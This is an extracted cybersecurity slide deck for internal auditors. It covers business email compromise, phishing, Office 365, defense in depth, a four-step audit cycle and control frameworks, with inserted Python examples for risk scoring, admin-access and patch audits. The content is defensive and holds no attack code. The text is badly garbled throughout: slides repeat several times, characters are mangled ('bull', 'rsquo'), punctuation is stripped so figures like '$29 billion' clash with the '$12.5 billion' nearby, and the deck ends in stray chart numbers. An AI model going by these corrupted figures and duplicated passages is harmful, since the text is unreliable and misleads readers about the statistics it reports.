• Some attack vectors do not require a phishing email
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash

Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables

Cash Disbursement
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of the information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication

Other Processes to Consider
• Treasury
• Payroll
• Royalties
• Cyber Insurance
• Legal Liabilities
• Contract Language
• SOX Impact
… AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment).
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap.
Chart: MITIGATING CONTROL COUNTS - a bar chart showing, for each candidate control, the number of over-threshold risk instances it reduces (only the bar values survived the extraction; the control names did not).
How the counts were produced:
A) Identify information systems with a calculated cybersecurity risk > 100.
B) For each such system, does it carry the SPECIFIC THREAT with a cybersecurity risk over 100 (Yes / No)? If yes, move to the next step.
C) Identify the mitigating controls to implement against that threat.
D) Total all instances where a control reduced risk.
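The Step 1 risk assessment and the Step 3 controls analysis above describe a procedure in words. The block below is an added worked example, written for this edit and not a tool from the presentation, that carries the procedure through: score every (critical data asset, threat) pair, keep the pairs whose calculated risk is over the deck's threshold of 100, and total the mitigating-control counts the chart summarizes. The scoring formula (impact x likelihood x exposure, each on a 1-5 scale), the asset inventory, the threat catalogue, the exposure values and the control mapping are all assumptions made for illustration; the deck itself only says the risk is scored semi-quantitatively and that systems over 100 are carried forward.

```python
"""Worked example of the Step 1 -> Step 3 flow: score the cybersecurity risk of
every (critical data asset, threat) pair, keep the pairs whose calculated risk
is over the deck's threshold of 100, map each surviving pair to the controls
that mitigate its threat, and total how many risk instances each control
reduces (the "mitigating control counts" bar chart).

Added illustration, not the presenter's own tool. The scoring formula
(impact x likelihood x exposure, each on a 1-5 scale, so 125 is the maximum),
the asset inventory, the threat catalogue and the control mapping are all
constructed assumptions.
"""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass

RISK_THRESHOLD = 100  # from the deck: only risks calculated > 100 move to the next step


@dataclass(frozen=True)
class Asset:
    name: str            # Step 1: identification of the asset
    system: str          # Step 1: where the data lives
    classification: str  # Step 1: classification
    impact: int          # 1-5: damage if the data is stolen, altered or lost


# Constructed inventory; system and asset names are hypothetical.
ASSETS = [
    Asset("Customer credit card data", "payments-db", "Restricted", 5),
    Asset("Employee records (HR/W-2)", "hris", "Confidential", 5),
    Asset("Vendor master file / bank info", "erp", "Confidential", 5),
    Asset("Marketing brochures", "web-cms", "Public", 1),
]

# Constructed threat catalogue: threat -> (likelihood 1-5, controls that mitigate it)
THREATS = {
    "Phishing / credential theft": (5, ["Multi-factor authentication", "Security awareness training"]),
    "Exploitation of unpatched system": (5, ["Patch management", "Vulnerability scanning"]),
    "Business email compromise (payment fraud)": (5, ["Multi-factor authentication", "Security awareness training", "Vendor bank-change verification"]),
    "Privileged account abuse": (3, ["Least-privilege access review", "Privileged access monitoring"]),
}

# Constructed exposure 1-5 per system: how reachable it is (internet-facing or cloud = high)
EXPOSURE = {"payments-db": 5, "hris": 4, "erp": 5, "web-cms": 5}


def risk_score(asset: Asset, likelihood: int) -> int:
    """Assumed semi-quantitative formula: impact x likelihood x exposure (max 125)."""
    return asset.impact * likelihood * EXPOSURE[asset.system]


def risk_register() -> list[tuple[str, str, int]]:
    """Step 1 output: (asset, threat, score) for every pair, highest risk first."""
    rows = [(a.name, t, risk_score(a, lk)) for a in ASSETS for t, (lk, _) in THREATS.items()]
    return sorted(rows, key=lambda r: r[2], reverse=True)


def over_threshold(threshold: int = RISK_THRESHOLD) -> list[tuple[str, str, int]]:
    """Steps A/B: keep only pairs whose calculated risk is strictly greater than the threshold.
    A pair scoring exactly 100 does NOT qualify, so the threshold choice matters."""
    return [r for r in risk_register() if r[2] > threshold]


def mitigating_control_counts(threshold: int = RISK_THRESHOLD) -> Counter:
    """Steps C/D: credit every control that mitigates the threat of each surviving pair,
    then total the instances per control; the largest count is the control that reduces
    risk for the most critical data assets and belongs at the top of the roadmap."""
    counts: Counter = Counter()
    for _asset, threat, _score in over_threshold(threshold):
        _likelihood, controls = THREATS[threat]
        counts.update(controls)
    return counts


if __name__ == "__main__":
    for asset, threat, score in risk_register():
        flag = "*" if score > RISK_THRESHOLD else " "
        print(f"{flag} {score:4d}  {asset:32s} {threat}")
    print("\nMitigating control counts (highest first):")
    for control, n in mitigating_control_counts().most_common():
        print(f"{n:3d}  {control}")
```

With these constructed inputs the employee-records rows score exactly 100, so they drop out at the deck's strict "> 100" threshold but come back in at 99; an auditor should expect the workpapers to document why the threshold sits where it does, because the control ranking shifts with it.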
STEP 4 - CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position.
• Consider using the COBIT Process Capability Model to map out the CSC (CIS Critical Security Controls) framework, which will allow management to begin tracking cybersecurity maturity.
COBIT process capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
0 = INCOMPLETE (defined by the COBIT 5 Process Assessment Model for a process that is not performed or fails its purpose; not shown on the slide)
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family - Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY - CRITICAL SECURITY CONTROLS
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX: the systems in scope for financial reporting are only part of the estate.
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges.
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns.
• Evaluate your company's overall cybersecurity training and awareness program.
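The four access checks above (approved least privilege, admin identities used for daily work, a stricter admin password standard, and alerting on privilege changes) can each be expressed as a test over an account inventory and a privilege-change log. The block below is an added example written for this edit, not the presenter's tooling: the account list, the approved-admin register, the two password policies and the event lines are constructed, and the event lines are a simplified rendering of Windows Security events 4728/4732/4756 (member added to a security-enabled global/local/universal group), not a verbatim log export.

```python
"""Audit tests for the "User and Administrator Level Access" checks: who holds
privileged rights and whether that is approved (least privilege), privileged
accounts that also do daily work such as email, whether the admin password
standard is actually stricter than the standard one, and alerting on additions
to privileged groups.

Added illustration, not the presenter's tooling. All data below is constructed;
the event lines are a simplified form of Windows Security events 4728/4732/4756,
not an actual export.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "ERP_Admins"}


@dataclass(frozen=True)
class Account:
    user: str
    groups: frozenset[str]
    has_mailbox: bool   # a mailbox on a privileged identity = it is used for daily tasks


# Constructed inventory (hypothetical names). Deliberately includes two bad patterns.
ACCOUNTS = [
    Account("jsmith", frozenset({"Domain Users"}), True),
    Account("jsmith-adm", frozenset({"Domain Users", "Domain Admins"}), False),
    Account("rlee", frozenset({"Domain Users", "Administrators"}), True),      # admin with mailbox
    Account("svc_backup", frozenset({"Domain Users", "Domain Admins"}), False),
    Account("tmoore", frozenset({"Domain Users", "ERP_Admins"}), True),       # admin with mailbox
]
APPROVED_ADMINS = {"jsmith-adm", "svc_backup"}  # constructed approved-admin register


def is_privileged(acct: Account) -> bool:
    return bool(acct.groups & PRIVILEGED_GROUPS)


def unapproved_admins() -> list[str]:
    """Least privilege: privileged accounts that are not on the approved register."""
    return sorted(a.user for a in ACCOUNTS if is_privileged(a) and a.user not in APPROVED_ADMINS)


def admins_with_mailbox() -> list[str]:
    """Privileged accounts that also read email, i.e. admin identities used for daily tasks."""
    return sorted(a.user for a in ACCOUNTS if is_privileged(a) and a.has_mailbox)


# Constructed password policies. The admin policy must be at least as strict on every parameter.
POLICY = {
    "standard": {"min_length": 8,  "max_age_days": 90,  "complexity": True, "sharing_allowed": False},
    "admin":    {"min_length": 12, "max_age_days": 180, "complexity": True, "sharing_allowed": False},
}


def admin_policy_gaps() -> list[str]:
    """Parameters on which the admin password policy is weaker than the standard one."""
    std, adm = POLICY["standard"], POLICY["admin"]
    gaps = []
    if adm["min_length"] < std["min_length"]:
        gaps.append("min_length")
    if adm["max_age_days"] > std["max_age_days"]:  # a longer change interval is the weaker setting
        gaps.append("max_age_days")
    if std["complexity"] and not adm["complexity"]:
        gaps.append("complexity")
    if adm["sharing_allowed"]:
        gaps.append("sharing_allowed")
    return gaps


# Constructed, simplified event lines:
#   <date> <event id> member=<user> group="<group>" by=<actor> ticket=<change id or none>
EVENT_RE = re.compile(
    r'^(?P<date>\S+) (?P<eid>4728|4732|4756) member=(?P<member>\S+) '
    r'group="(?P<group>[^"]+)" by=(?P<actor>\S+) ticket=(?P<ticket>\S+)$'
)
EVENTS = [
    '2018-10-02 4728 member=jsmith-adm group="Domain Admins" by=itops1 ticket=CHG-1042',
    '2018-10-03 4732 member=rlee group="Administrators" by=rlee ticket=none',
    '2018-10-03 4728 member=helpdesk3 group="Print Operators" by=itops1 ticket=none',
    '2018-10-04 4728 member=tmoore group="ERP_Admins" by=itops2 ticket=none',
]


def privileged_group_additions(lines: list[str] = EVENTS) -> list[dict]:
    """Alert on additions to privileged groups that have no change ticket or were self-granted.
    Additions to non-privileged groups are ignored; ticketed additions raise no alert."""
    alerts = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m or m["group"] not in PRIVILEGED_GROUPS:
            continue
        reasons = []
        if m["ticket"] == "none":
            reasons.append("no change ticket")
        if m["actor"] == m["member"]:
            reasons.append("self-granted")
        if reasons:
            alerts.append({"date": m["date"], "member": m["member"], "group": m["group"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print("Privileged accounts not on approved register:", unapproved_admins())
    print("Privileged accounts with a mailbox:", admins_with_mailbox())
    print("Admin password policy weaker than standard on:", admin_policy_gaps())
    for alert in privileged_group_additions():
        print("ALERT", alert)
```

The constructed admin policy is deliberately weaker on one parameter (a 180-day change interval against 90 for standard users) to show that "higher standard" has to be checked parameter by parameter rather than assumed from a longer minimum length.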
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures. Common findings:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the devices in their network and therefore are unable to adequately assess their patch management process.
• Ensure your IT departments are scanning all assets continuously so that newly discovered vulnerabilities are identified quickly.
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place.
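The vulnerability management checks above reduce to a reconciliation: scanner output against the asset inventory, patch age against an agreed window, and the exceptions against a risk-acceptance register. The block below is an added example written for this edit, not the presenter's tooling. The inventory, scanner output, patch windows (30 days for internet-facing devices, 90 days otherwise) and risk-acceptance register are constructed assumptions, and the vulnerability ids are placeholders rather than real CVEs.

```python
"""Audit tests for the vulnerability-management checks: does the company know
all of its devices (scanner results vs. asset inventory), is every inventoried
device actually scanned, is patching keeping up with an agreed window, and are
the items that cannot be patched formally accepted and still within their
acceptance period?

Added illustration, not the presenter's tooling. All data below is constructed;
a real scanner export carries far more fields, but the reconciliation logic is
the same.
"""
from __future__ import annotations
from dataclasses import dataclass
from datetime import date

AS_OF_ISO = "2018-10-15"                               # audit "as of" date, constructed
PATCH_WINDOW_DAYS = {"internet": 30, "internal": 90}   # assumed patching policy by exposure


@dataclass(frozen=True)
class Finding:
    device: str
    kind: str    # unknown_device | never_scanned | overdue_patch | acceptance_expired
    detail: str


# Constructed asset inventory (CMDB): device -> exposure
INVENTORY = {"web01": "internet", "erp-app01": "internal", "fs01": "internal", "vpn-gw": "internet"}

# Constructed scanner output: (device, vulnerability id, date the vendor released the patch)
SCAN = [
    ("web01",     "VULN-A", "2018-09-01"),   # 44 days old on an internet-facing box -> overdue
    ("web01",     "VULN-B", "2018-10-01"),   # 14 days old -> still inside the window
    ("erp-app01", "VULN-C", "2017-06-01"),   # over a year old, but formally accepted until 2019
    ("fs01",      "VULN-D", "2018-05-01"),   # 167 days old, acceptance lapsed on 2018-09-30
    ("printer07", "VULN-E", "2018-08-01"),   # the scanner sees it, the inventory has never heard of it
]

# Constructed risk-acceptance register: (device, vulnerability) -> acceptance expiry date
RISK_ACCEPTED = {("erp-app01", "VULN-C"): "2019-06-01", ("fs01", "VULN-D"): "2018-09-30"}


def patch_age_days(released_iso: str, as_of_iso: str = AS_OF_ISO) -> int:
    """Days between the vendor's patch release and the audit date."""
    return (date.fromisoformat(as_of_iso) - date.fromisoformat(released_iso)).days


def vulnerability_findings(as_of_iso: str = AS_OF_ISO) -> list[Finding]:
    findings: list[Finding] = []
    inventoried = set(INVENTORY)
    scanned = {dev for dev, _, _ in SCAN}

    # 1. Devices the scanner sees that the inventory does not: you cannot patch what you do not know about.
    for dev in sorted(scanned - inventoried):
        findings.append(Finding(dev, "unknown_device", "in scan results but not in the asset inventory"))

    # 2. Inventoried devices with no scan coverage, so their patch state is simply unknown.
    for dev in sorted(inventoried - scanned):
        findings.append(Finding(dev, "never_scanned", "in the asset inventory but absent from scan results"))

    # 3. Patch lag against the window, with the risk-acceptance register as the only valid exception.
    for dev, vuln, released in SCAN:
        exposure = INVENTORY.get(dev)
        if exposure is None:
            continue  # already reported under unknown_device
        age = patch_age_days(released, as_of_iso)
        window = PATCH_WINDOW_DAYS[exposure]
        if age <= window:
            continue
        expiry = RISK_ACCEPTED.get((dev, vuln))
        if expiry is None:
            findings.append(Finding(dev, "overdue_patch", f"{vuln}: patch released {age} days ago, window is {window}, no accepted risk on file"))
        elif expiry < as_of_iso:  # ISO dates compare correctly as strings
            findings.append(Finding(dev, "acceptance_expired", f"{vuln}: risk acceptance expired {expiry}"))
        # else: accepted and current; no finding, but the mitigating controls still get reviewed
    return findings


def findings_by_kind(as_of_iso: str = AS_OF_ISO) -> dict[str, list[str]]:
    """Devices grouped by finding type, the shape an audit workpaper summary needs."""
    grouped: dict[str, list[str]] = {}
    for f in vulnerability_findings(as_of_iso):
        grouped.setdefault(f.kind, []).append(f.device)
    return grouped


if __name__ == "__main__":
    for f in vulnerability_findings():
        print(f"{f.kind:19s} {f.device:10s} {f.detail}")
```

Re-running with a later "as of" date shows why acceptances need an expiry: the erp-app01 exception is clean in October 2018 and becomes an acceptance_expired finding once its date passes, which is exactly the "formally accepted and tracked" condition the slide asks the auditor to test.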
CYBERSECURITY - SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated, so that a compromise of production systems cannot also destroy the backups.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal - mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates - stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
BEC (BUSINESS EMAIL COMPROMISE) & PHISHING
Phishing: a form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear Phishing: phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include clone phishing (a copy of a previously delivered legitimate email with its attachment or link swapped for a malicious one) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for tax data (the IRS has sent out warnings)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage.
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies.
• 20% of all companies use Office 365.
• Office 365 overtook traditionally licensed Office products in the 4th quarter of 2017 as the largest Office revenue stream for Microsoft.
• Most companies do not correctly set up Office 365 security or logging.
• There has been a significant increase in attack vectors against Office 365.
• It only takes one employee and the hacker is inside email and Office 365.
• Some attack vectors do not require a phishing email.
BEC ATTACK WALKTHROUGH
BEC - PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k: a triggered review and customer communication uncovered a change in bank info (the communication was being sent to a deleted email).
• Reports that generate overdue receivables timely for follow-up.
• Escalation rules for overdue receivables.
Cash Disbursements
• SOD (segregation of duties): limit access to the vendor master file.
• Controls related to changing bank info for all vendors: this needs more than email communication; personally verify with the vendor requesting the change, using contact details already on file rather than those in the request.
• Vendor set-up: verification of the information provided.
• ISNetworld: a vetting process for vendors; could require vetting prior to set-up as a vendor.
• ACH debits: no reason to give debit access to the account; if it is done, dual approval and a ZBA (zero balance account) should be used.
• Multi-factor authentication.
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX impact
• Cyber insurance
• Legal liabilities
• Contract language
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes.
• Security keys hold up where one-time codes do not because the key signs a challenge bound to the genuine site's origin, so a look-alike phishing page cannot obtain a usable response, whereas a code typed into a fake page can simply be relayed to the real one.
• Office 365 and other cloud-based services should all use multi-factor authentication.
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around the company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
Layers to evaluate:
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks mean that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and the associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets.
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets.
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls.
Step 4 - Follow-up reviews to monitor control implementation progress.
Repeat.
Cycle: Risk Assessments -> Create a Baseline / Gap Analysis -> Implement and Manage Controls -> Assess & Report -> repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist.
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified.
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event.
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks, so that information security risks can be identified, estimated and prioritized.
Flow: Identification of Assets -> Asset Locations -> Classification of Assets -> Threat Modeling -> Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
